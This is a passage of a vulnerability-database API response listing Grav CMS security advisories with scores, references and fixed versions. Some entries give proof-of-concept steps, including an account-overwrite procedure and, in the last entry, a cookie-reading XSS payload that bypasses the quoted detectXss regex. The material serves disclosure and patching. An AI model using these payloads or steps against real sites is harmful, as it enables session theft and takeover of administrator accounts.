"VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66300", "GHSA-p4ww-mcp9-j6f2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-abwg-zvc9-w7dq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49296?format=api", "vulnerability_id": "VCID-agks-r1vd-u3d6", "summary": "Grav vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/pages/[page]` in Multiples parameters\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][metadata]`, `data[header][taxonomy][category]`, and `data[header][taxonomy][tag]` parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66311", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07273", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66311" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66311", "reference_id": "CVE-2025-66311", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66311" }, { "reference_url": "https://github.com/advisories/GHSA-mpjj-4688-3fxg", "reference_id": "GHSA-mpjj-4688-3fxg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mpjj-4688-3fxg" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg", "reference_id": "GHSA-mpjj-4688-3fxg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72692?format=api", "purl": "pkg:composer/getgrav/grav@1.11.0-beta.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.11.0-beta.1" } ], "aliases": [ "CVE-2025-66311", "GHSA-mpjj-4688-3fxg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-agks-r1vd-u3d6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95468?format=api", "vulnerability_id": "VCID-athb-nf3a-yyga", "summary": "Grav Vulnerable to Administrative Account Disruption and Privilege De-escalation via User Overwrite Logic\n### Summary\nA business logic vulnerability in the Grav Admin Panel allows a low-privileged user (with only user creation permissions) to overwrite existing accounts, including the primary administrator. By creating a new user with a username that already exists, the system updates the existing account's metadata and permissions instead of rejecting the request. This leads to a Denial of Service (DoS) on administrative functions and Privilege De-escalation of the root account.\n\n### Details\nThe vulnerability stems from an insecure \"Create or Update\" logic within the user management module. When the admin-addon handles a user creation request, it does not strictly validate whether the username is already taken by a higher-privileged account. Instead of returning a \"409 Conflict\" or a validation error, the application logic proceeds to overwrite the existing user configuration file (e.g., user/accounts/root0.yaml) with the new, lower-privileged data provided by the attacker.\nBecause the attacker cannot assign higher permissions to themselves (due to existing fixes), the result is that the targeted account (the original Admin/Root) has its access levels wiped or replaced by the attacker's input, effectively locking the real administrator out of the system.\n\n### PoC\n1. Log in as a Super User (e.g., root0) and create a low-privileged user (e.g., adminuser).\n2. Assign adminuser the following specific permissions:\nadmin.login\nadmin.users.list\nadmin.users.read\nadmin.users.create\n3. Log out and log back in as adminuser.\n4. Navigate to User Accounts -> Add.\n5. Fill in the form with the following details:\nUsername: root0 (The exact username of the Super User)\nEmail: `anything@grav.f`\nFullname: Fake Root0\n7. Click Save.\n8. Observe that the account is successfully \"created\".\n9. The original administrative permissions are gone, and the account is now restricted.\n\n#### PoC video\nhttps://github.com/user-attachments/assets/047cb44e-0279-402b-b4fb-12bf5d427a5e\n\n### Impact\nThis is a Privilege De-escalation and Account Disruption vulnerability.\nWho is impacted: Any Grav installation where a non-admin user is granted permission to create other users.\nConsequence: An attacker can effectively disable all administrative accounts on the platform, leading to a complete loss of management control over the CMS.\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `UserObject::save` already had a uniqueness guard (commit [`19c2f8da7`](https://github.com/getgrav/grav/commit/19c2f8da7), November 2025) that blocks the PoC. This release tightens that guard:\n\n1. `strpos($key, '@@')` → `str_contains($key, '@@')`. The previous form was falsy when the transient-key marker was at position 0 (e.g. `@@hash`), silently bypassing the check. `str_contains` returns a proper boolean.\n2. The `instanceof FileStorage` gate was dropped so the uniqueness check runs for any `FlexStorageInterface` backend — not just the default file-per-user YAML one.\n\nA low-privileged user with `admin.users.create` can no longer disrupt a super-admin account by submitting that admin's username through the \"add user\" form.\n\n**Files:**\n- [`system/src/Grav/Common/Flex/Types/Users/UserObject.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Flex/Types/Users/UserObject.php).\n- [`tests/unit/Grav/Common/Security/UserOverwriteSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/UserOverwriteSecurityTest.php) — 3 tests pinning the PoC, the `@@`-prefix edge case, and pass-through for free usernames.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42609", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.1284", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42609" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/" } ], "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47" }, { "reference_url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/" } ], "url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-rr73-568v-28f8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-rr73-568v-28f8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42609", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42609" }, { "reference_url": "https://github.com/advisories/GHSA-rr73-568v-28f8", "reference_id": "GHSA-rr73-568v-28f8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-rr73-568v-28f8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42609", "GHSA-rr73-568v-28f8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-athb-nf3a-yyga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49310?format=api", "vulnerability_id": "VCID-bafn-ne38-nucy", "summary": "Grav Exposes Password Hashes Leading to privilege escalation\n# Exposure of Password Hashes Leading to privilege escalation\n**Severity Rating:** Medium \n\n**Vector:** Privilege Escalation\n\n**CVE:** XXX\n\n**CWE:** 200 - Exposure of Sensitive Information\n\n**CVSS Score:** 6.2\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L\n\n## Analysis\n\nIt was observed that if a users is given read access on the user account management section of the admin panel can view the password hashes of all users, including the admin user. This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes.\n\nAn attacker with read access can: \n* View and potentially crack the password hashes.\n* Gain administrative access by cracking the admin password hash.\n* Escalate privileges and compromise the entire admin panel.\n\n\n## Proof of Concept\n\n1) Give read access to user accounts to a random user as shown in the following figures:\n \n \n \n\n2) Log in to the admin panel with an account that has read access to user accounts and navigate to the user account management section.\n\n3) Go to the admin profile `http://127.0.0.1/admin/accounts/users/admin`; The password is not display. Try inspecting the page source code as shown in the following figures:\n \n \n You can see that it match the hash that is in the admin.yaml file :\n \n \n\n4) Crack the hash as shown in the following figure, the algorithm use here is bcrypt:\n \n\n \n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66304", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00071", "scoring_system": "epss", "scoring_elements": "0.2179", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66304" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/" } ], "url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66304", "reference_id": "CVE-2025-66304", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66304" }, { "reference_url": "https://github.com/advisories/GHSA-gq3g-666w-7h85", "reference_id": "GHSA-gq3g-666w-7h85", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gq3g-666w-7h85" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85", "reference_id": "GHSA-gq3g-666w-7h85", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66304", "GHSA-gq3g-666w-7h85" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bafn-ne38-nucy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49321?format=api", "vulnerability_id": "VCID-bhhz-z132-zkhb", "summary": "Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection\nA user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66297", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00475", "scoring_system": "epss", "scoring_elements": "0.65195", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66297" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/" } ], "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66297", "reference_id": "CVE-2025-66297", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66297" }, { "reference_url": "https://github.com/advisories/GHSA-858q-77wx-hhx6", "reference_id": "GHSA-858q-77wx-hhx6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-858q-77wx-hhx6" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6", "reference_id": "GHSA-858q-77wx-hhx6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66297", "GHSA-858q-77wx-hhx6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bhhz-z132-zkhb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46988?format=api", "vulnerability_id": "VCID-bwvg-jg4z-nyhp", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nA cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-31506", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.1466", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-31506" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506", "reference_id": "CVE-2023-31506", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-16T17:13:14Z/" } ], "url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31506", "reference_id": "CVE-2023-31506", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31506" }, { "reference_url": "https://github.com/advisories/GHSA-xrf8-cmrg-7436", "reference_id": "GHSA-xrf8-cmrg-7436", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xrf8-cmrg-7436" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/68849?format=api", "purl": "pkg:composer/getgrav/grav@1.7.44", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.44" } ], "aliases": [ "CVE-2023-31506", "GHSA-xrf8-cmrg-7436" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bwvg-jg4z-nyhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95256?format=api", "vulnerability_id": "VCID-c9jy-y2dh-x3dg", "summary": "Grav Vulnerable to Publisher-Level Stored XSS via Unquoted Event Attributes\n### Summary\nA stored Cross-Site Scripting (XSS) vulnerability in `getgrav/grav` allows publisher-level accounts to execute arbitrary JavaScript. The issue arises from a blacklist bypass in the `detectXss()` function when handling unquoted HTML event attributes.\n\n### Details\nThe `detectXss()` function relies on a blacklist pattern to filter malicious attributes. The specific regex pattern used to match `on*` events is flawed:\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu'\n```\nThis pattern fails to properly identify `on*` event handlers that are constructed without quotation marks. This allows an attacker to completely bypass the filter. *Note: It is highly recommended to replace this blacklist approach with a robust, established HTML sanitization library.*\n\n### PoC\nAn attacker with publisher-level access can reproduce this by injecting the following payload into any vulnerable content field:\n```html\n<img src=x onerror=eval(atob(/YWxlcnQoZG9jdW1lbnQuY29va2llKQ/.source))>\n```\n<img width=\"1889\" height=\"482\" alt=\"image1\" src=\"https://github.com/user-attachments/assets/0f1a339b-25a8-4b6e-91af-8c59e6a39297\" />\n<img width=\"3055\" height=\"920\" alt=\"image2\" src=\"https://github.com/user-attachments/assets/12680058-bbb3-4446-b58e-515533bb4e90\" />\n<img width=\"2909\" height=\"1339\" alt=\"image3\" 